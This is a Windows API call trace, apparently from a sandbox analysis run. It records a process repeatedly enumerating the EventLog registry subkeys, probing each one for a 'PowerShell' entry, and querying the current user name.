	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.604] CoTaskMemFree (pv=0x46ba40) 
	[0200.604] CoTaskMemFree (pv=0x0) 
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x308) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x30c) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x310) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x1d0) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x330) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.604] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x334) returned 0x0
	[0200.604] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0200.605] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x5
	[0201.766] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x338) returned 0x0
	[0201.767] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x0) returned 0x2
	[0201.767] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x33c) returned 0x0
	[0201.767] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3a8 | out: phkResult=0x29d3a8*=0x340) returned 0x0
	[0201.767] RegCloseKey (hKey=0x340) returned 0x0
	[0201.767] RegCloseKey (hKey=0x324) returned 0x0
	[0201.768] RegCloseKey (hKey=0x33c) returned 0x0
	[0201.834] CoTaskMemAlloc (cb=0x804) returned 0x1b858470
	[0201.834] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b858470, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0201.835] CoTaskMemFree (pv=0x1b858470) 
	[0201.836] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0201.836] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0201.836] CoTaskMemFree (pv=0x46ba40) 
	[0203.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d2f8 | out: phkResult=0x29d2f8*=0x344) returned 0x0
	[0203.190] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d26c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d268*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.190] CoTaskMemFree (pv=0x0) 
	[0203.190] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.191] CoTaskMemFree (pv=0x46ba40) 
	[0203.191] CoTaskMemFree (pv=0x0) 
	[0203.191] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.191] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.192] CoTaskMemFree (pv=0x46ba40) 
	[0203.192] CoTaskMemFree (pv=0x0) 
	[0203.192] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.192] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.192] CoTaskMemFree (pv=0x46ba40) 
	[0203.192] CoTaskMemFree (pv=0x0) 
	[0203.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x348) returned 0x0
	[0203.192] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x34c) returned 0x0
	[0203.192] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x350) returned 0x0
	[0203.192] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x354) returned 0x0
	[0203.192] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.192] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x358) returned 0x0
	[0203.192] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.193] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x35c) returned 0x0
	[0203.193] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.193] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x5
	[0203.205] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x360) returned 0x0
	[0203.205] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.205] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x364) returned 0x0
	[0203.205] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x368) returned 0x0
	[0203.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d2f8 | out: phkResult=0x29d2f8*=0x364) returned 0x0
	[0203.260] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d26c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d268*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.260] CoTaskMemFree (pv=0x0) 
	[0203.260] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.260] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.261] CoTaskMemFree (pv=0x46ba40) 
	[0203.261] CoTaskMemFree (pv=0x0) 
	[0203.261] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.261] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.262] CoTaskMemFree (pv=0x46ba40) 
	[0203.262] CoTaskMemFree (pv=0x0) 
	[0203.263] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.263] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.264] CoTaskMemFree (pv=0x46ba40) 
	[0203.264] CoTaskMemFree (pv=0x0) 
	[0203.264] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.264] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.265] CoTaskMemFree (pv=0x46ba40) 
	[0203.265] CoTaskMemFree (pv=0x0) 
	[0203.265] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.265] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.266] CoTaskMemFree (pv=0x46ba40) 
	[0203.266] CoTaskMemFree (pv=0x0) 
	[0203.266] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.267] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.268] CoTaskMemFree (pv=0x46ba40) 
	[0203.268] CoTaskMemFree (pv=0x0) 
	[0203.268] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.268] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.269] CoTaskMemFree (pv=0x46ba40) 
	[0203.270] CoTaskMemFree (pv=0x0) 
	[0203.270] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.270] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.271] CoTaskMemFree (pv=0x46ba40) 
	[0203.271] CoTaskMemFree (pv=0x0) 
	[0203.271] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.271] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x46ba40, lpcchName=0x29d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.272] CoTaskMemFree (pv=0x46ba40) 
	[0203.272] CoTaskMemFree (pv=0x0) 
	[0203.272] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x344) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x368) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x36c) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x370) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x374) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x378) returned 0x0
	[0203.273] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.273] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x5
	[0203.284] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x37c) returned 0x0
	[0203.284] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x0) returned 0x2
	[0203.284] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x380) returned 0x0
	[0203.285] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d358 | out: phkResult=0x29d358*=0x384) returned 0x0
	[0203.285] RegCloseKey (hKey=0x384) returned 0x0
	[0203.285] RegCloseKey (hKey=0x364) returned 0x0
	[0203.285] RegCloseKey (hKey=0x380) returned 0x0
	[0203.287] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d2c8 | out: phkResult=0x29d2c8*=0x380) returned 0x0
	[0203.287] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d23c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d238*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.287] CoTaskMemFree (pv=0x46ba40) 
	[0203.287] CoTaskMemFree (pv=0x0) 
	[0203.287] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.287] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.288] CoTaskMemFree (pv=0x46ba40) 
	[0203.288] CoTaskMemFree (pv=0x0) 
	[0203.288] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.288] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.288] CoTaskMemFree (pv=0x46ba40) 
	[0203.288] CoTaskMemFree (pv=0x0) 
	[0203.288] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
